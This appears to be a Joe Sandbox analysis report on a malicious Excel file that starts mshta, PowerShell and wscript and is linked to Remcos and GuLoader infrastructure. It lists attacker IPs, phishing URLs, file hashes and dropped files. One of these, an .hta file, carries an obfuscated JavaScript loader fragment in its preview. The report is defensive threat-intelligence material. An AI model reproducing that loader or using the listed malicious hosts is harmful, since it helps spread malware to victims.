                                                                                                                                                              Sample name:0200011080.xls
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winXLS@37/39@13/5
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 71.4%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                              • Number of executed functions: 199
                                                                                                                                                              • Number of non-executed functions: 321
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .xls
                                                                                                                                                              • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Active ActiveX Object
                                                                                                                                                              • Active ActiveX Object
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer

                                                                                                                                                              Warnings

                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.47.112.37, 104.17.202.1, 104.17.201.1
                                                                                                                                                              • Excluded domains from analysis (whitelisted): ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, resc.cloudinary.com.cdn.cloudflare.net
                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 3588 because there are no executed function
                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 4084 because there are no executed function
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • VT rate limit hit for: 0200011080.xls

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              08:00:56API Interceptor138x Sleep call for process: mshta.exe modified
                                                                                                                                                              08:01:02API Interceptor241x Sleep call for process: powershell.exe modified
                                                                                                                                                              08:01:14API Interceptor36x Sleep call for process: wscript.exe modified
                                                                                                                                                              08:01:40API Interceptor917893x Sleep call for process: CasPol.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              31.13.224.7217327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                  OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                    178.237.33.501099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    INTECH RFQ EN241813.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    RFQ_PX2_MULE2024_Travco_Engineering_Construction_PDF.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                    151.101.65.137http://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                      https://www.searchunify.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                        https://www.searchunify.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                          024d88b8-442e-50b9-5c43-7c71d1433823.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                            https://www.searchunify.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                              https://u32377541.ct.sendgrid.net/ls/click?upn=gbTUAIFdI3uVBaKVDIrm-2Fv1ZSHGPk6CrjUU8HwxRv3XogX5Mvrx9Tv11VuNRbuYsH1zE-2BIBtWDMzlXTEj-2B9-2BJTYJUT036UmzKCMNFUBTmVHWoZUf0I1RAxEy8rjXD3hieFWty-2FlRfiDpGIk0JqX9IB9V5jztpnU2UQb-2B16gY3H4Vf0wR0k6IoF0Sd5AebKUD4d2WkW0zPMzEZHgQk4PilA-3D-3DuEN5_joQjRSvNxC1G7o6EQLc2eubh6d5j8MX480B8rjwEUVwIWLFJiTnn42uP24WiJdkk1wENxr6Z-2BcAnb-2BzO-2BoPsei4n3KKCnOb9-2F-2BSfzt2WRD4NciHjr9qdj4nKQIhwvjiTm1Jue7LvqYkwbzFVzOATkYWOMZmWh-2BNVftF4HxLBJoXbBuOBUAUmn6Bqy1FylGA9WHXOBxBzzpW5ZaKjOzL87uR02AFin4npksOlwKwsoHq8EQaijmSkucUIL66YcB9E9ngCKs2TqyrD6EC45xUnNc-2B8tztAXLdahj5Hwv2yUqjDKwEnSxAQq-2BkVZxzYDr-2BlH1XzRdCmvlVYLxz5Egu5y-2F16Pmnn22vIEe2gWufenNNxM3SXN0b06i9EX9e-2BxsnRYNg9SylsaxdVU0OWpsqBQGRGYCmzw3CE2B7O5a39Hk0AMDkGwpnrIIt-2F9uOR6hua6zuv9fcoQQry3m8BO-2FRBwC3Oa02ZrduYodn1TfpSII4CIlpzrpXvNsmwcMyNz4Vf4pGTr-2Bte4cyNZVxQ1bhSeOnWSFOpetOEG2MEc-2B519M27Y-2FmNr8hKutIP6TDnL9nk9lZeosJs4LxqLO7TB-2FeksEtqgoSjKUJHg3wVZKXNzM4xnYfmVzk2Aw5mxHjIC-2BkwLXnfP09KqjfTHuA2wwPnHBfEMZ9b6VF1dOdpxmFHWIdsPCsYDTo9nUvjnYCusyM1AkuYnqg6Yz5htZbWe-2Fky7wr1LY-2FW22aKZnRD8zoMSjnuZ8Zfq0rrC4BwNHpRUuVs8JU19-2FUDbIcijHTDd26VewLCqZhSLdLQfS5McOZY5bpkvICuCE4mVuUsxCu9wNzgqVAescw46u1sfcZ-2B0HVNk4LyFuw9f3LCooMwUgcuqPE-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                http://bookmarkinghost.infoGet hashmaliciousUnknownBrowse

                                                                                                                                                                                  Domains

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  cloudinary.map.fastly.net1013911.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 151.101.1.137
                                                                                                                                                                                  http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.129.137
                                                                                                                                                                                  Steelcase Series 1 Sustainable Office Chair _ Steelcase.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.129.137
                                                                                                                                                                                  https://jenifer-lopezz.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.129.137
                                                                                                                                                                                  https://bookme.name/simonmed/usGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                  • 151.101.129.137
                                                                                                                                                                                  http://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  http://itsecurityupdate.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.1.137
                                                                                                                                                                                  https://link.mail.beehiiv.com/ss/c/SFMS2DGC_3bR2eTtelyfFUzhcGs9TWsEeQw8nQp279J9B9upNohe5IND2DzRg4GfFe3uzMCkwl0VCcFF4p9tdZ71PSC4SlxBXIoR6qgai_e9KXQu46yVwLcidRn-ax90dry5wHpUbN5t2kTBuqVHtjiUR148OM6f2kzv0FbM9-j2d8Pfv1aAiA8m-jIRZ1qPGcwv7cKHtg7zS7k4vguTCgqcLvbDJq61ZPMm3FUyJbd-2ROdV-1aYJVxlO48nGuxkYE6PJ8AjBLfTrwxiX4S2X3JBdpAgH-S1qPrWFIUFnwhW_rcr9w0IZhVJg2k6UwPe0XxcmVm_hXa3Zy0nKOCBvO11zW3IuzS0wT0aqoeUGhUZL_BJAovHWU-78ta_hn0kcmqrlBzh66Yb9lBLgDUfmEypG1yBWRlXPRZ1w7redaJaooKiPuwr2V5n8bXDS9_yWg2USHIOqCrcsTtBGYogmSv3HnV9rD8TCUiXo47xhMBVMzr7StZWjjgT4kZsxK7CX-zIn8YCCC8lkjyOEp6xgdXFjETIB4df5tQm7lBbPlCZ99btsVwezxOnJZ4MV1piJOH9CONfmhGD5405v_OGQ0ddDY5d31qqadrUj9T5uo/422/2hUrqrZHQZSMSqb_7MA2RQ/h1/bXAkiKjrMazQzzpENtDvosiaH2ZRcmZd0aMxcbDunvMGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.193.137
                                                                                                                                                                                  https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.1.137
                                                                                                                                                                                  https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.1.137
                                                                                                                                                                                  geoplugin.net1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  INTECH RFQ EN241813.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  RFQ_PX2_MULE2024_Travco_Engineering_Construction_PDF.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                  • 178.237.33.50

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                  phish_alert_sp2_2.0.0.0 (8).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                  https://searchandprint.recipesGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.2.137
                                                                                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                  • 151.101.65.91
                                                                                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                  • 151.101.193.91
                                                                                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                  • 151.101.193.91
                                                                                                                                                                                  I_ katya_gianotti@cuzziol_it password scadr#U00e0 oggi!.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.1.91
                                                                                                                                                                                  SARNICA-ASBG17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 31.13.224.72
                                                                                                                                                                                  Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                  • 31.13.224.72
                                                                                                                                                                                  Evjm8L1nEb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 31.13.224.69
                                                                                                                                                                                  ugisGK1R1q.exeGet hashmaliciousDarkVision RatBrowse
                                                                                                                                                                                  • 31.13.224.69
                                                                                                                                                                                  Evjm8L1nEb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 31.13.224.69
                                                                                                                                                                                  OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                  • 31.13.224.72
                                                                                                                                                                                  n5QCsKJ0CP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                  • 31.13.224.34
                                                                                                                                                                                  ahmbf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 31.13.224.69
                                                                                                                                                                                  Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 93.123.109.168
                                                                                                                                                                                  Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 93.123.109.168
                                                                                                                                                                                  ATOM86-ASATOM86NL1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  INTECH RFQ EN241813.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  RFQ_PX2_MULE2024_Travco_Engineering_Construction_PDF.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                  DIGITALOCEAN-ASNUSSFaLIQYuEV.htmGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                  • 68.183.112.81
                                                                                                                                                                                  8xOax9866X.htmGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                  • 68.183.112.81
                                                                                                                                                                                  uioLmjrj4F.htmGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                  • 68.183.112.81
                                                                                                                                                                                  https://es.vecteezy.com/arte-vectorial/20279878-kyd-letra-logo-diseno-en-blanco-antecedentes-kyd-creativo-circulo-letra-logo-concepto-kyd-letra-disenoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 161.35.119.123
                                                                                                                                                                                  https://secure_sharing0utlook.wesendit.com/dl/ON6fQWpNLtFc53e1u/bWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 67.207.79.245
                                                                                                                                                                                  https://atpscan.global.hornetsecurity.com/?d=m-jrZYNTvS7OucEG6zgopo_P-eFuotBy6khKzMMoLZ4&f=B3z_aD7k-FJHzGTgRypMC4okZ3IwSory4vTIxE3HdJ_vtmaZKtKUThjBimGO9ug0&i=&k=4AW8&m=GVQPkt_RSTiDpwD3aZUptFFr0zCshjoFLqhJ3NjtibWBkTpV22jDRnOpUHUftsT9uvGtNvEk65KPlyjsi0fzlHEgnGzER6prH6oEwQ6iGZMuyrzkW43X0VpXiLTd8OwU&n=LPqMxEbLmB_Zh1f7NoMu0JEABS3tNgPjYsrca87TqctDejHSuebypqLStQvhBN5eG43hQ2ReWbrTClyFyYZQHA&r=-0Amt46rVl0s1yn8_P2jWFIQhQ5qvzjVNyyZ7Ng6X4pWNR2O0BffN49tqRoSmkJg&s=ef9a322854c7503d3037fcbcda0a6c433cee94d107fe0a8ab1fda12b2f14509b&u=https%3A%2F%2Fsecure_sharing0utlook.wesendit.com%2Fdl%2FON6fQWpNLtFc53e1u%2FbWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 67.207.79.245
                                                                                                                                                                                  https://www.therooms.ca/sites/default/files/images/virtual-exhibits/rnr/3dobject_example.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 157.230.71.133
                                                                                                                                                                                  https://bielefelde.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 206.189.225.178
                                                                                                                                                                                  botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 134.123.187.11
                                                                                                                                                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                  • 45.55.15.182

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  05af1f5ca1b87cc9cc9b25185115607dPAGAMENTO CREDIT_AGRICOLE.docGet hashmaliciousXWormBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  PO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  Swift copy.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  RFQ-ROJECT FTL 010-271124.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 151.101.65.137
                                                                                                                                                                                  7dcce5b76c8b17472d024758970a406bSwiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 54.150.207.131
                                                                                                                                                                                  Pagamento deposito e fattura proforma firmata.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 54.150.207.131
                                                                                                                                                                                  PO# BBGR2411PO69.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 54.150.207.131
                                                                                                                                                                                  PI-02911202409#.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 54.150.207.131
                                                                                                                                                                                  PI-02911202409#.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 54.150.207.131
                                                                                                                                                                                  Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 54.150.207.131
                                                                                                                                                                                  Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 54.150.207.131
                                                                                                                                                                                  New Order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 54.150.207.131
                                                                                                                                                                                  New Order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 54.150.207.131
                                                                                                                                                                                  PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                  • 54.150.207.131

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  No context

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15189
                                                                                                                                                                                  Entropy (8bit):5.0343247648743
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                                                                                                                                  MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                                                                                                                                  SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                                                                                                                                  SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                                                                                                                                  SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:@...e...........................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].hta

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):159730
                                                                                                                                                                                  Entropy (8bit):2.151955061259752
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:4owZw9d6yfaRlC/5u5oB3WnKqjIlgREe/b2F53QStlC/5u5oB3WnKqjIAgREe/bQ:4Lwsoqvgc12OYUQ
                                                                                                                                                                                  MD5:B57E8C4722889166196BD6CA92C4383A
                                                                                                                                                                                  SHA1:5628162AB713E034F10FCE235B08C0FF8E4131D5
                                                                                                                                                                                  SHA-256:5147E58C7D2D5D0296C74619C246F81569DAB8C9271513B19B3D1BD4C406C702
                                                                                                                                                                                  SHA-512:2887FAD423BD58E20EDEE6D0809FCFBF2A768D14F463DA8DDF69E0EB823E3F42304EB41FC38111124C60B3D4E9385054F0CF7D84512E6B5128CF8E43BA70847D
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].hta, Author: Joe Security
                                                                                                                                                                                  Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2527%25253C%252521%252544%25254F%252543%252554%252559%252550%252545%252520%252568%252574%25256D%25256C%25253E%25250A%25253C%25256D%252565%252574%252561%252520%252568%252574%252574%252570%25252D%252565%252571%252575%252569%252576%25253D%252522%252558%25252D%252555%252541%25252D%252543%25256F%25256D%252570%252561%252574%252569%252562%25256C%252565%252522%252520%252563%25256F%25256E%252574%252565%25256E%252574%25253D%252522%252549%252545%25253D%252545%25256D%252575%25256C%252561%252574%252565%252549%252545%252538%252522%252520%25253E%25250A%25253C%252568%252574%25256D%25256C%25253E%25250A%25253C%252562%25256F%252564%252579%25253E%25250A%25253C%252573%252543%252552%252549%252570%252574%252520%25256C%252541%25256E%252547%2525

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\weneedkissingwellongirlfriendshebeautifulgirl[1].tiff

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (3200), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):153968
                                                                                                                                                                                  Entropy (8bit):3.790314730405568
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:tx65fliEYTNokaahkpx65fliEYTNokaahvpx65fliEYTNokaah+:tAHGNAiCAHGNAiRAHGNAi+
                                                                                                                                                                                  MD5:23F2631CE99480A209B12A8F520D5480
                                                                                                                                                                                  SHA1:1F6CB113C9A2FF37CE5047B25EE7F432A4DBC950
                                                                                                                                                                                  SHA-256:4F1B501AD9C6CFEDAC6521C680F30D4FDBFDBD86C2742755D07F67C4939F0235
                                                                                                                                                                                  SHA-512:D906B932E7D6C8BD87D47E7D52E2CAF0AE05231E02BA720D8F81D9A90F5A2688773EC80CA91775B8753812FD638D2D123564489DA066A4C423DD76EB7F5CCAAE
                                                                                                                                                                                  Malicious:false
